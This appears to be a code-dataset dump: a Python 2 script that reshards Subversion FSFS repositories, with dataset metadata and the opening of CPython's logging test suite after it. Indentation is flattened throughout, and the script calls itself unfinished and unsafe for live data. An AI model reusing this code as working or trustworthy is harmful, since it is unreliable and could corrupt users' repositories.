revs_size = compute_rev_sizes(revs_path, fs_format[1], False)
compute_shard_sizes(revs_size, target_shard)
else:
sys.stdout.write(".\n")
sys.stdout.flush()
def main():
if len(sys.argv) < 2:
usage()
repos_path = sys.argv[1]
# Get [number format, sharded]
fs_format = check_fs_format(repos_path)
# Get minimum unpacked revision, Subversion >= 1.6
min_unpacked_rev = 0
min_unpacked_rev_path = os.path.join(repos_path, 'db', 'min-unpacked-rev')
if os.path.exists(min_unpacked_rev_path):
min_unpacked_rev_file = open(min_unpacked_rev_path)
try:
min_unpacked_rev = int(min_unpacked_rev_file.readline())
except ValueError, OverflowError:
sys.stderr.write("error: repository db/min-unpacked-rev does not contain a valid number.\n")
sys.stderr.flush()
sys.exit(1)
min_unpacked_rev_file.close()
try:
start = int(sys.argv[3])
end = int(sys.argv[4])
except IndexError:
start = 0
end = int(current_file(repos_path)[0])
# Validate the command-line arguments.
db_path = os.path.join(repos_path, 'db')
current_path = os.path.join(db_path, 'current')
if not os.path.exists(current_path):
sys.stderr.write("error: '%s' doesn't appear to be a Subversion FSFS repository.\n" \
% repos_path)
sys.stderr.flush()
sys.exit(1)
if len(sys.argv) == 2 or (len(sys.argv) == 3 and sys.argv[2].startswith('target=')):
print_estimate_shards(repos_path, fs_format, min_unpacked_rev)
sys.exit(0)
try:
max_files_per_shard = int(sys.argv[2])
except ValueError, OverflowError:
sys.stderr.write("error: maximum files per shard ('%s') is not a valid number.\n" \
% sys.argv[2])
sys.stderr.flush()
sys.exit(1)
if max_files_per_shard < 0:
sys.stderr.write("error: maximum files per shard ('%d') must not be negative.\n" \
% max_files_per_shard)
sys.stderr.flush()
sys.exit(1)
# Check the format of the repository.
check_repos_format(repos_path)
reshard = max_files_per_shard != fs_format[1]
if not reshard:
print_estimate_shards(repos_path, fs_format, min_unpacked_rev)
sys.exit(0)
check_packed_shards_logical(fs_format, min_unpacked_rev) # and exits if so
# Let the user know what's going on.
if max_files_per_shard > 0:
print("Converting '%s' to a sharded structure with %d files per directory" \
% (repos_path, max_files_per_shard))
if min_unpacked_rev > 0:
print('(will unpack)')
if reshard:
print('(will convert to a linear structure)')
else:
print("Converting '%s' to a linear structure" % repos_path)
# Prevent access to the repository for the duration of the conversion.
# There's no clean way to do this, but since the format of the repository
# is indeterminate, let's remove the format file while we're converting.
print('- marking the repository as invalid')
backup_fs_format(repos_path)
# First, convert to a linear scheme (this makes recovery easier)
if fs_format[1] > 0:
revs_path = os.path.join(repos_path, 'db', 'revs')
if min_unpacked_rev > 0:
# First unpack
if is_packed_revprops_compressed(repos_path):
incompatible_fs_format(repos_path, fs_format[0])
print('- unpacking db/revs')
compute_rev_sizes(revs_path, fs_format[1], True)
print('- unpacking db/revprops')
unpack_revprops_shards(os.path.join(repos_path, 'db', 'revprops'), fs_format[1])
min_unpacked_rev = 0
reset_min_unpacked(min_unpacked_rev_path)
# If sharding is different, convert to a linear scheme
if reshard:
print('- linearising db/revs')
linearise(revs_path)
print('- linearising db/revprops')
linearise(os.path.join(repos_path, 'db', 'revprops'))
if reshard and max_files_per_shard > 0:
print('- sharding db/revs')
shard(os.path.join(repos_path, 'db', 'revs'), max_files_per_shard,
start, end)
print('- sharding db/revprops')
shard(os.path.join(repos_path, 'db', 'revprops'), max_files_per_shard,
start, end)
fs_format[1] = max_files_per_shard
if max_files_per_shard == 0:
print('- marking the repository as a valid linear repository')
else:
# Sharded. Keep original 3/4 format or upgrade format 2 to 3.
if fs_format[0] == 2:
fs_format[0] = 3
print('- marking the repository as a valid sharded repository')
# We're done. Stamp the filesystem with a format 2/3/4/6/7 db/format file.
write_fs_format(repos_path, fs_format)
print('- done.')
sys.exit(0)
main()
if __name__ == '__main__':
raise Exception("""This script is unfinished and not ready to be used on live data.
Trust us. Prepare a backup and run svnadmin verify before putting your repo online""")
| 37.146776 | 98 | 0.70229 |
import os, stat, sys, shutil
from errno import EEXIST
from sets import Set
import ConfigParser
def usage():
"""Print a usage message and exit."""
print("""usage: %s REPOS_PATH [target=MAX_FILES_PER_SHARD]
Computes shard sizes for current repository or for a target
MAX_FILES_PER_SHARD to tune this parameter according to
performance criteria.
usage: %s REPOS_PATH MAX_FILES_PER_SHARD [START END]
Perform an offline conversion of an FSFS repository between linear
(readable by Subversion 1.4 or later) and sharded (readable by
Subversion 1.5 or later) layouts.
It is recommended to first upgrade your repository to your current
Subversion release with 'svnadmin upgrade REPOS_PATH'.
Packed shards are unpacked before converting. According to your
needs, you may want to invoke 'svnadmin pack REPOS_PATH' after.
The MAX_FILES_PER_SHARD argument specifies the maximum number of
files that will be stored in each shard (directory), or zero to
specify a linear layout. Subversion 1.5 uses a default value of
1000 files per shard.
Convert revisions START through END inclusive if specified, or all
revisions if unspecified.
""" % sys.argv[0])
sys.exit(1)
def incompatible_repos_format(repos_path, format):
"""Print an error saying that REPOS_PATH is a repository with an
incompatible repository format FORMAT, then exit."""
sys.stderr.write("""error: unable to convert repository '%s'.
This repository is not compatible with this tool. Valid
repository formats are '3' or '5'; this repository is
format '%s'.
""" % (repos_path, format))
sys.stderr.flush()
sys.exit(1)
def incompatible_fs_format(repos_path, format):
"""Print an error saying that REPOS_PATH is a repository with an
incompatible filesystem format FORMAT, then exit."""
sys.stderr.write("""error: unable to open repository '%s'.
This repository contains a filesystem that is not compatible with
this tool. Valid filesystem formats are '1', '2', '3', '4' or '6'; this
repository contains a filesystem with format '%s'.
Compressed packed revprops is not supported.
Packed shards with logical addressing cannot be analyzed or unpacked.
""" % (repos_path, format))
sys.stderr.flush()
sys.exit(1)
def unexpected_fs_format_options(repos_path):
"""Print an error saying that REPOS_PATH is a repository with
unexpected filesystem format options, then exit."""
sys.stderr.write("""error: unable to open repository '%s'.
This repository contains a filesystem that appears to be invalid -
there is unexpected data after the filesystem format number.
""" % repos_path)
sys.stderr.flush()
sys.exit(1)
def incompatible_fs_format_option(repos_path, option):
"""Print an error saying that REPOS_PATH is a repository with an
incompatible filesystem format option OPTION, then exit."""
sys.stderr.write("""error: unable to convert repository '%s'.
This repository contains a filesystem that is not compatible with
this tool. This tool recognises the 'layout' and 'addressing'
options but the filesystem uses the '%s' option.
""" % (repos_path, option))
sys.stderr.flush()
sys.exit(1)
def warn_about_fs_format_1(repos_path, format_path):
"""Print a warning saying that REPOS_PATH contains a format 1 FSFS
filesystem that we can't reconstruct, then exit."""
sys.stderr.write("""warning: conversion of '%s' will be one-way.
This repository is currently readable by Subversion 1.1 or later.
This tool can convert this repository to one that is readable by
either Subversion 1.4 (or later) or Subversion 1.5 (or later),
but it is not able to convert it back to the original format - a
separate dump/load step would be required.
If you would like to upgrade this repository anyway, delete the
file '%s' and re-run this tool.
""" % (repos_path, format_path))
sys.stderr.flush()
sys.exit(1)
def check_repos_format(repos_path):
"""Check that REPOS_PATH contains a repository with a suitable format;
print a message and exit if not."""
format_path = os.path.join(repos_path, 'format')
try:
format_file = open(format_path)
format = format_file.readline()
if not format.endswith('\n'):
incompatible_repos_format(repos_path, format + ' <missing newline>')
format = format.rstrip('\n')
if format == '3' or format == '5':
pass
else:
incompatible_repos_format(repos_path, format)
except IOError:
# In all likelihood, the file doesn't exist.
incompatible_repos_format(repos_path, '<unreadable>')
def is_packed_revprops_compressed(repos_path):
"""Check if repository at REPOS_PATH has compressed revprops enabled."""
fsfsconf_path = os.path.join(repos_path, 'db', 'fsfs.conf')
try:
config = ConfigParser.ConfigParser()
config.read(fsfsconf_path)
return config.getboolean('packed-revprops', 'compress-packed-revprops')
except IOError:
incompatible_repos_format(repos_path, '<unreadable>')
except (ConfigParser.NoSectionError, ConfigParser.NoOptionError):
return False # Likely section is lacking or option is commented
def check_packed_shards_logical(fs_format, min_unpacked_rev):
"""Check if repository with logical addressing has packed shards."""
if fs_format[2] == "logical" and min_unpacked_rev > 0:
sys.stdout.write("\n")
sys.stdout.flush()
sys.stderr.write("Packed shards with logical addressing cannot be analyzed or unpacked.\n")
sys.stderr.flush()
sys.exit(1)
return False
def check_fs_format(repos_path):
"""Check that REPOS_PATH contains a filesystem with a suitable format,
or that it contains no format file; print a message and exit if neither
is true. Return an array [format number, shard size] whether the filesystem is sharded."""
result = [0, 0, None]
db_path = os.path.join(repos_path, 'db')
format_path = os.path.join(db_path, 'format')
if not(os.path.exists(format_path)):
# Recover from format.bak if interrupted
format_path = os.path.join(db_path, 'format.bak')
if not(os.path.exists(format_path)):
sys.stderr.write("error: db/format and db/format.bak missing.\n")
sys.stderr.flush()
sys.exit(1)
try:
format_file = open(format_path)
format = format_file.readline()
if not format.endswith('\n'):
incompatible_fs_format(repos_path, format + ' <missing newline>')
format = format.rstrip('\n')
if format == '1':
# This is a format 1 (svndiff0 only) filesystem. We can upgrade it,
# but we can't downgrade again (since we can't uncompress any of the
# svndiff1 deltas that may have been written). Warn the user and exit.
warn_about_fs_format_1(repos_path, format_path)
if format == '2' or format == '3' or format == '4' or format == '6' or format == '7':
pass
else:
incompatible_fs_format(repos_path, format)
result[0] = format;
for line in format_file:
if format == '2':
unexpected_fs_format_options(repos_path)
line = line.rstrip('\n')
if line == 'layout linear':
pass
elif line.startswith('layout sharded '):
result[1] = int(line[15:])
elif line.startswith('addressing '):
result[2] = line[11:]
else:
incompatible_fs_format_option(repos_path, line)
format_file.close()
except IOError:
# The format file might not exist if we've previously been interrupted,
# compatible.
pass
return result
def current_file(repos_path):
"""Return triple of (revision, next_node_id, next_copy_id) from
REPOS_PATH/db/current ."""
return open(os.path.join(repos_path, 'db', 'current')).readline().split()
def backup_fs_format(repos_path):
"""Rename the filesystem format file for repository REPOS_PATH.
Do not raise an error if the file is already renamed."""
format_path = os.path.join(repos_path, 'db', 'format')
try:
statinfo = os.stat(format_path)
except OSError:
# The file probably doesn't exist.
return
format_bak_path = os.path.join(repos_path, 'db', 'format.bak')
os.chmod(format_path, statinfo.st_mode | stat.S_IWUSR)
try:
os.rename(format_path, format_bak_path)
except OSError:
os.remove(format_bak_path)
os.rename(format_path, format_bak_path)
def write_fs_format(repos_path, fs_format):
"""Write a new filesystem format file for repository REPOS_PATH
according to fs_format information."""
format_path = os.path.join(repos_path, 'db', 'format')
format_bak_path = os.path.join(repos_path, 'db', 'format.bak')
try:
os.rename(format_bak_path, format_path)
except OSError:
os.remove(format_path)
f = open(format_path, 'wb')
f.write(fs_format[0])
f.write('\n')
if fs_format[0] > 2:
if fs_format[1] > 0:
f.write('layout sharded %d\n' % fs_format[1])
else:
f.write('layout linear\n')
if fs_format[0] > 6 and fs_format[2] != None:
f.write('addressing %s\n' % fs_format[2])
f.close()
def suffix_unpacked_shard(path):
"""Add '.shard' suffix to unpacked shard number directory."""
for name in os.listdir(path):
if name.endswith('.shard') or name.endswith('.pack'):
continue
subdir_path = os.path.join(path, name)
if not os.path.isdir(subdir_path):
continue
os.rename(subdir_path, subdir_path + '.shard')
def linearise(path):
"""Move all the files in subdirectories of PATH into PATH, and remove the
subdirectories. Handle conflicts between subdirectory names and files
contained in subdirectories by ensuring subdirectories have a '.shard'
suffix prior to moving (the files are assumed not to have this suffix.
Abort if a subdirectory is found to contain another subdirectory."""
suffix_unpacked_shard(path)
for root_path, dirnames, filenames in os.walk(path):
if root_path == path:
continue
if len(dirnames) > 0:
sys.stderr.write("error: directory '%s' contains other unexpected directories.\n" \
% root_path)
sys.stderr.flush()
sys.exit(1)
for name in filenames:
from_path = os.path.join(root_path, name)
to_path = os.path.join(path, name)
os.rename(from_path, to_path)
os.rmdir(root_path)
def shard(path, max_files_per_shard, start, end):
"""Move the files for revisions START to END inclusive in PATH into
subdirectories of PATH named such that subdirectory '0' contains at most
MAX_FILES_PER_SHARD files, those named [0, MAX_FILES_PER_SHARD). Abort if
PATH is found to contain any entries with non-numeric names."""
tmp = path + '.reshard'
try:
os.mkdir(tmp)
except OSError, e:
if e.errno != EEXIST:
raise
for rev in range(start, end + 1):
name = str(rev)
shard = rev // max_files_per_shard
shard_name = str(shard) + '.shard'
from_path = os.path.join(path, name)
to_path = os.path.join(tmp, shard_name, name)
try:
os.rename(from_path, to_path)
except OSError:
# exist. Let's create it and retry the rename.
os.mkdir(os.path.join(tmp, shard_name))
os.rename(from_path, to_path)
skipped = 0
for name in os.listdir(tmp):
if not name.endswith('.shard'):
sys.stderr.write("warning: ignoring unexpected subdirectory '%s'.\n" \
% os.path.join(tmp, name))
sys.stderr.flush()
skipped += 1
continue
from_path = os.path.join(tmp, name)
to_path = os.path.join(path, os.path.basename(from_path)[:-6])
os.rename(from_path, to_path)
skipped == 0 and os.rmdir(tmp)
def extract_part(source, start_position, end_position, target_file):
"""Extract source from start to end position to a target file"""
copy_buffer_size = 4096
if not os.path.exists(os.path.dirname(target_file)):
os.makedirs(os.path.dirname(target_file))
target = open(target_file, 'wb')
last_position = start_position
source.seek(last_position)
while last_position < end_position:
bytes_tocopy = copy_buffer_size
if (end_position - last_position) < copy_buffer_size:
bytes_tocopy = end_position - last_position
rev_buffer = source.read(bytes_tocopy)
target.write(rev_buffer)
last_position += len(rev_buffer)
if bytes_tocopy < copy_buffer_size:
break
target.close()
return last_position
def unpack_shard(packed_path, shard_number, unpack, first_rev, revs_size):
"""Compute revision sizes in a packed shard at packed_path and unpack revisions
if unpack is True. The first revision of the shard has first_rev number.
Revision sizes are stored in rev_sizes dictionnary.
"""
manifest = open(os.path.join(packed_path, 'manifest'), 'r')
pack_path = os.path.join(packed_path, 'pack')
end_pack = os.path.getsize(pack_path)
if unpack:
pack = open(pack_path, 'rb')
last_position = int(manifest.readline())
rev_index = first_rev
while last_position < end_pack:
try:
byte_position = int(manifest.readline())
except ValueError:
byte_position = end_pack
revs_size[rev_index] = byte_position - last_position
if unpack:
arev = os.path.join(packed_path, os.path.pardir, str(shard_number), str(rev_index))
last_position = extract_part(pack, last_position, byte_position, arev)
else:
last_position = byte_position
rev_index += 1
manifest.close()
if unpack:
pack.close()
return revs_size
def unpack_revprops_shard(packed_path, shard_number, first_rev):
"""Unpack a single revision properties shard to linear mode"""
revprops_packfile = {}
packfiles = Set()
with open(os.path.join(packed_path, 'manifest'), 'rb') as manifest:
for revfile in manifest:
revfile = revfile.rstrip('\n')
revprops_packfile[first_rev] = revfile
packfiles.add(revfile)
first_rev += 1
for apackfile in packfiles:
packrevprops = open(os.path.join(packed_path, apackfile), 'rb')
packrevprops.read(2)
rev = int(packrevprops.readline())
rev_count = int(packrevprops.readline())
end_rev = rev + rev_count - 1
revprop_sizes = {}
for r in range(rev, rev + rev_count):
revprop_sizes[r] = int(packrevprops.readline())
packrevprops.readline()
last_position = packrevprops.tell()
while rev <= end_rev:
end_position = last_position + revprop_sizes[rev]
if apackfile == revprops_packfile[rev]:
arev = os.path.join(packed_path, os.path.pardir, str(shard_number), str(rev))
last_position = extract_part(packrevprops, last_position, end_position, arev)
else:
last_position = end_position
rev += 1
packrevprops.close()
def unpack_revprops_shards(revprops_path, current_shard):
"""Unpack revision properties shards"""
for root_path, dirnames, filenames in os.walk(revprops_path):
if len(dirnames) > 0:
for name in dirnames:
if (not(name.endswith('.pack'))):
continue
shard_number = int(name[:-5])
shard_path = os.path.join(root_path, name)
unpack_revprops_shard(shard_path, shard_number,
current_shard * shard_number if shard_number > 0 else 1)
shutil.rmtree(shard_path)
def compute_rev_sizes(revs_path, current_shard, unpack):
"""Compute revision sizes based on current shard capacity Support either
linear, sharded or packed revisions. If unpack is True, packed sharded are
unpacked too.
"""
revs_size = {}
for root_path, dirnames, filenames in os.walk(revs_path):
if len(filenames) > 0:
for name in filenames:
try:
revnum = int(name)
revs_size[revnum] = os.path.getsize(os.path.join(root_path, name))
except ValueError:
pass
if len(dirnames) > 0:
for name in dirnames:
if (not(name.endswith('.pack'))):
continue
shard_number = int(name[:-5])
shard_path = os.path.join(root_path, name)
revs_size = unpack_shard(shard_path, shard_number, unpack,
current_shard * shard_number, revs_size)
if unpack:
shutil.rmtree(shard_path)
return revs_size
def compute_shard_sizes(revs_size, max_files_per_shard):
"""Compute shard sizes based on target max_files_per_shard
and map of revision size."""
current_shard = 0
current_shard_size = 0
min_shard_size = 2**63
max_shard_size = 0
shard_size_sum = 0
for i, size in revs_size.iteritems():
current_shard_size += size
if ((i + 1) % max_files_per_shard) == 0:
print 'Shard %d size: %d' % (current_shard, current_shard_size)
shard_size_sum += current_shard_size
if current_shard_size < min_shard_size:
min_shard_size = current_shard_size
if current_shard_size > max_shard_size:
max_shard_size = current_shard_size
current_shard_size = 0
current_shard += 1
if current_shard_size != 0:
print 'Shard %d size: %d' % (current_shard, current_shard_size)
if current_shard > 0:
print 'Average full-shard size %d. Minimum: %d, Maximum: %d.' \
% ((shard_size_sum / current_shard), min_shard_size, max_shard_size)
def reset_min_unpacked(min_unpacked_rev_path):
"""Reset min-unpacked-rev after unpack."""
with open(min_unpacked_rev_path, 'wb') as min_unpacked_rev_file:
min_unpacked_rev_file.write('0\n')
def print_estimate_shards(repos_path, fs_format, min_unpacked_rev):
"""Print repository information and computes shard sizes for the specified
target
"""
fs_format = check_fs_format(repos_path)
target_shard = fs_format[1]
if len(sys.argv) == 3 and sys.argv[2].startswith('target='):
try:
target_shard = int(sys.argv[2][7:])
except ValueError, OverflowError:
sys.stderr.write("error: target maximum files per shard ('%s') is not a valid number.\n" \
% sys.argv[2])
sys.stderr.flush()
sys.exit(1)
revs_path = os.path.join(repos_path, 'db', 'revs')
sys.stdout.write("Current FSFS db format version ")
sys.stdout.write(fs_format[0])
if fs_format[1] > 0:
sys.stdout.write(" with sharded layout, max files per shard: ")
sys.stdout.write(str(fs_format[1]))
if min_unpacked_rev > 0:
sys.stdout.write(", packed shards: ")
sys.stdout.write(str(min_unpacked_rev / fs_format[1]))
else:
sys.stdout.write(" with linear layout")
check_packed_shards_logical(fs_format, min_unpacked_rev)
if target_shard > 0:
sys.stdout.write(".\nList of shard sizes for max files per shard = ")
sys.stdout.write(str(target_shard))
sys.stdout.write("\n")
revs_size = compute_rev_sizes(revs_path, fs_format[1], False)
compute_shard_sizes(revs_size, target_shard)
else:
sys.stdout.write(".\n")
sys.stdout.flush()
def main():
if len(sys.argv) < 2:
usage()
repos_path = sys.argv[1]
fs_format = check_fs_format(repos_path)
min_unpacked_rev = 0
min_unpacked_rev_path = os.path.join(repos_path, 'db', 'min-unpacked-rev')
if os.path.exists(min_unpacked_rev_path):
min_unpacked_rev_file = open(min_unpacked_rev_path)
try:
min_unpacked_rev = int(min_unpacked_rev_file.readline())
except ValueError, OverflowError:
sys.stderr.write("error: repository db/min-unpacked-rev does not contain a valid number.\n")
sys.stderr.flush()
sys.exit(1)
min_unpacked_rev_file.close()
try:
start = int(sys.argv[3])
end = int(sys.argv[4])
except IndexError:
start = 0
end = int(current_file(repos_path)[0])
db_path = os.path.join(repos_path, 'db')
current_path = os.path.join(db_path, 'current')
if not os.path.exists(current_path):
sys.stderr.write("error: '%s' doesn't appear to be a Subversion FSFS repository.\n" \
% repos_path)
sys.stderr.flush()
sys.exit(1)
if len(sys.argv) == 2 or (len(sys.argv) == 3 and sys.argv[2].startswith('target=')):
print_estimate_shards(repos_path, fs_format, min_unpacked_rev)
sys.exit(0)
try:
max_files_per_shard = int(sys.argv[2])
except ValueError, OverflowError:
sys.stderr.write("error: maximum files per shard ('%s') is not a valid number.\n" \
% sys.argv[2])
sys.stderr.flush()
sys.exit(1)
if max_files_per_shard < 0:
sys.stderr.write("error: maximum files per shard ('%d') must not be negative.\n" \
% max_files_per_shard)
sys.stderr.flush()
sys.exit(1)
# Check the format of the repository.
check_repos_format(repos_path)
reshard = max_files_per_shard != fs_format[1]
if not reshard:
print_estimate_shards(repos_path, fs_format, min_unpacked_rev)
sys.exit(0)
check_packed_shards_logical(fs_format, min_unpacked_rev) # and exits if so
# Let the user know what's going on.
if max_files_per_shard > 0:
print("Converting '%s' to a sharded structure with %d files per directory" \
% (repos_path, max_files_per_shard))
if min_unpacked_rev > 0:
print('(will unpack)')
if reshard:
print('(will convert to a linear structure)')
else:
print("Converting '%s' to a linear structure" % repos_path)
# is indeterminate, let's remove the format file while we're converting.
print('- marking the repository as invalid')
backup_fs_format(repos_path)
# First, convert to a linear scheme (this makes recovery easier)
if fs_format[1] > 0:
revs_path = os.path.join(repos_path, 'db', 'revs')
if min_unpacked_rev > 0:
# First unpack
if is_packed_revprops_compressed(repos_path):
incompatible_fs_format(repos_path, fs_format[0])
print('- unpacking db/revs')
compute_rev_sizes(revs_path, fs_format[1], True)
print('- unpacking db/revprops')
unpack_revprops_shards(os.path.join(repos_path, 'db', 'revprops'), fs_format[1])
min_unpacked_rev = 0
reset_min_unpacked(min_unpacked_rev_path)
# If sharding is different, convert to a linear scheme
if reshard:
print('- linearising db/revs')
linearise(revs_path)
print('- linearising db/revprops')
linearise(os.path.join(repos_path, 'db', 'revprops'))
if reshard and max_files_per_shard > 0:
print('- sharding db/revs')
shard(os.path.join(repos_path, 'db', 'revs'), max_files_per_shard,
start, end)
print('- sharding db/revprops')
shard(os.path.join(repos_path, 'db', 'revprops'), max_files_per_shard,
start, end)
fs_format[1] = max_files_per_shard
if max_files_per_shard == 0:
print('- marking the repository as a valid linear repository')
else:
# Sharded. Keep original 3/4 format or upgrade format 2 to 3.
if fs_format[0] == 2:
fs_format[0] = 3
print('- marking the repository as a valid sharded repository')
# We're done. Stamp the filesystem with a format 2/3/4/6/7 db/format file.
write_fs_format(repos_path, fs_format)
print('- done.')
sys.exit(0)
main()
if __name__ == '__main__':
raise Exception("""This script is unfinished and not ready to be used on live data.
Trust us. Prepare a backup and run svnadmin verify before putting your repo online""")
| false | true |
f7232f67eee7300d2e40c43492af00da60a37663 | 164,419 | py | Python | Lib/test/test_logging.py | jribbens/cpython | 2c5c0a367c6ca648178072240fe0a32848636da6 | [
"PSF-2.0"
] | 1 | 2019-09-04T02:06:21.000Z | 2019-09-04T02:06:21.000Z | Lib/test/test_logging.py | jribbens/cpython | 2c5c0a367c6ca648178072240fe0a32848636da6 | [
"PSF-2.0"
] | 1 | 2020-05-26T12:29:28.000Z | 2020-05-26T12:29:43.000Z | Lib/test/test_logging.py | jribbens/cpython | 2c5c0a367c6ca648178072240fe0a32848636da6 | [
"PSF-2.0"
] | 2 | 2018-05-03T01:08:13.000Z | 2019-12-02T03:03:43.000Z | # Copyright 2001-2017 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""Test harness for the logging module. Run all tests.
Copyright (C) 2001-2017 Vinay Sajip. All Rights Reserved.
"""
import logging
import logging.handlers
import logging.config
import codecs
import configparser
import datetime
import pathlib
import pickle
import io
import gc
import json
import os
import queue
import random
import re
import socket
import struct
import sys
import tempfile
from test.support.script_helper import assert_python_ok
from test import support
import textwrap
import threading
import time
import unittest
import warnings
import weakref
import asyncore
from http.server import HTTPServer, BaseHTTPRequestHandler
import smtpd
from urllib.parse import urlparse, parse_qs
from socketserver import (ThreadingUDPServer, DatagramRequestHandler,
ThreadingTCPServer, StreamRequestHandler)
try:
import win32evtlog, win32evtlogutil, pywintypes
except ImportError:
win32evtlog = win32evtlogutil = pywintypes = None
try:
import zlib
except ImportError:
pass
class BaseTest(unittest.TestCase):
"""Base class for logging tests."""
log_format = "%(name)s -> %(levelname)s: %(message)s"
expected_log_pat = r"^([\w.]+) -> (\w+): (\d+)$"
message_num = 0
def setUp(self):
"""Setup the default logging stream to an internal StringIO instance,
so that we can examine log output as we want."""
self._threading_key = support.threading_setup()
logger_dict = logging.getLogger().manager.loggerDict
logging._acquireLock()
try:
self.saved_handlers = logging._handlers.copy()
self.saved_handler_list = logging._handlerList[:]
self.saved_loggers = saved_loggers = logger_dict.copy()
self.saved_name_to_level = logging._nameToLevel.copy()
self.saved_level_to_name = logging._levelToName.copy()
self.logger_states = logger_states = {}
for name in saved_loggers:
logger_states[name] = getattr(saved_loggers[name],
'disabled', None)
finally:
logging._releaseLock()
# Set two unused loggers
self.logger1 = logging.getLogger("\xab\xd7\xbb")
self.logger2 = logging.getLogger("\u013f\u00d6\u0047")
self.root_logger = logging.getLogger("")
self.original_logging_level = self.root_logger.getEffectiveLevel()
self.stream = io.StringIO()
self.root_logger.setLevel(logging.DEBUG)
self.root_hdlr = logging.StreamHandler(self.stream)
self.root_formatter = logging.Formatter(self.log_format)
self.root_hdlr.setFormatter(self.root_formatter)
if self.logger1.hasHandlers():
hlist = self.logger1.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
if self.logger2.hasHandlers():
hlist = self.logger2.handlers + self.root_logger.handlers
raise AssertionError('Unexpected handlers: %s' % hlist)
self.root_logger.addHandler(self.root_hdlr)
self.assertTrue(self.logger1.hasHandlers())
self.assertTrue(self.logger2.hasHandlers())
def tearDown(self):
"""Remove our logging stream, and restore the original logging
level."""
self.stream.close()
self.root_logger.removeHandler(self.root_hdlr)
while self.root_logger.handlers:
h = self.root_logger.handlers[0]
self.root_logger.removeHandler(h)
h.close()
self.root_logger.setLevel(self.original_logging_level)
logging._acquireLock()
try:
logging._levelToName.clear()
logging._levelToName.update(self.saved_level_to_name)
logging._nameToLevel.clear()
logging._nameToLevel.update(self.saved_name_to_level)
logging._handlers.clear()
logging._handlers.update(self.saved_handlers)
logging._handlerList[:] = self.saved_handler_list
manager = logging.getLogger().manager
manager.disable = 0
loggerDict = manager.loggerDict
loggerDict.clear()
loggerDict.update(self.saved_loggers)
logger_states = self.logger_states
for name in self.logger_states:
if logger_states[name] is not None:
self.saved_loggers[name].disabled = logger_states[name]
finally:
logging._releaseLock()
self.doCleanups()
support.threading_cleanup(*self._threading_key)
def assert_log_lines(self, expected_values, stream=None, pat=None):
"""Match the collected log lines against the regular expression
self.expected_log_pat, and compare the extracted group values to
the expected_values list of tuples."""
stream = stream or self.stream
pat = re.compile(pat or self.expected_log_pat)
actual_lines = stream.getvalue().splitlines()
self.assertEqual(len(actual_lines), len(expected_values))
for actual, expected in zip(actual_lines, expected_values):
match = pat.search(actual)
if not match:
self.fail("Log line does not match expected pattern:\n" +
actual)
self.assertEqual(tuple(match.groups()), expected)
s = stream.read()
if s:
self.fail("Remaining output at end of log stream:\n" + s)
def next_message(self):
"""Generate a message consisting solely of an auto-incrementing
integer."""
self.message_num += 1
return "%d" % self.message_num
class BuiltinLevelsTest(BaseTest):
"""Test builtin levels and their inheritance."""
def test_flat(self):
# Logging levels in a flat logger namespace.
m = self.next_message
ERR = logging.getLogger("ERR")
ERR.setLevel(logging.ERROR)
INF = logging.LoggerAdapter(logging.getLogger("INF"), {})
INF.setLevel(logging.INFO)
DEB = logging.getLogger("DEB")
DEB.setLevel(logging.DEBUG)
# These should log.
ERR.log(logging.CRITICAL, m())
ERR.error(m())
INF.log(logging.CRITICAL, m())
INF.error(m())
INF.warning(m())
INF.info(m())
DEB.log(logging.CRITICAL, m())
DEB.error(m())
DEB.warning(m())
DEB.info(m())
DEB.debug(m())
# These should not log.
ERR.warning(m())
ERR.info(m())
ERR.debug(m())
INF.debug(m())
self.assert_log_lines([
('ERR', 'CRITICAL', '1'),
('ERR', 'ERROR', '2'),
('INF', 'CRITICAL', '3'),
('INF', 'ERROR', '4'),
('INF', 'WARNING', '5'),
('INF', 'INFO', '6'),
('DEB', 'CRITICAL', '7'),
('DEB', 'ERROR', '8'),
('DEB', 'WARNING', '9'),
('DEB', 'INFO', '10'),
('DEB', 'DEBUG', '11'),
])
def test_nested_explicit(self):
# Logging levels in a nested namespace, all explicitly set.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
# These should log.
INF_ERR.log(logging.CRITICAL, m())
INF_ERR.error(m())
# These should not log.
INF_ERR.warning(m())
INF_ERR.info(m())
INF_ERR.debug(m())
self.assert_log_lines([
('INF.ERR', 'CRITICAL', '1'),
('INF.ERR', 'ERROR', '2'),
])
def test_nested_inherited(self):
# Logging levels in a nested namespace, inherited from parent loggers.
m = self.next_message
INF = logging.getLogger("INF")
INF.setLevel(logging.INFO)
INF_ERR = logging.getLogger("INF.ERR")
INF_ERR.setLevel(logging.ERROR)
INF_UNDEF = logging.getLogger("INF.UNDEF")
INF_ERR_UNDEF = logging.getLogger("INF.ERR.UNDEF")
UNDEF = logging.getLogger("UNDEF")
# These should log.
INF_UNDEF.log(logging.CRITICAL, m())
INF_UNDEF.error(m())
INF_UNDEF.warning(m())
INF_UNDEF.info(m())
INF_ERR_UNDEF.log(logging.CRITICAL, m())
INF_ERR_UNDEF.error(m())
# These should not log.
INF_UNDEF.debug(m())
INF_ERR_UNDEF.warning(m())
INF_ERR_UNDEF.info(m())
INF_ERR_UNDEF.debug(m())
self.assert_log_lines([
('INF.UNDEF', 'CRITICAL', '1'),
('INF.UNDEF', 'ERROR', '2'),
('INF.UNDEF', 'WARNING', '3'),
('INF.UNDEF', 'INFO', '4'),
('INF.ERR.UNDEF', 'CRITICAL', '5'),
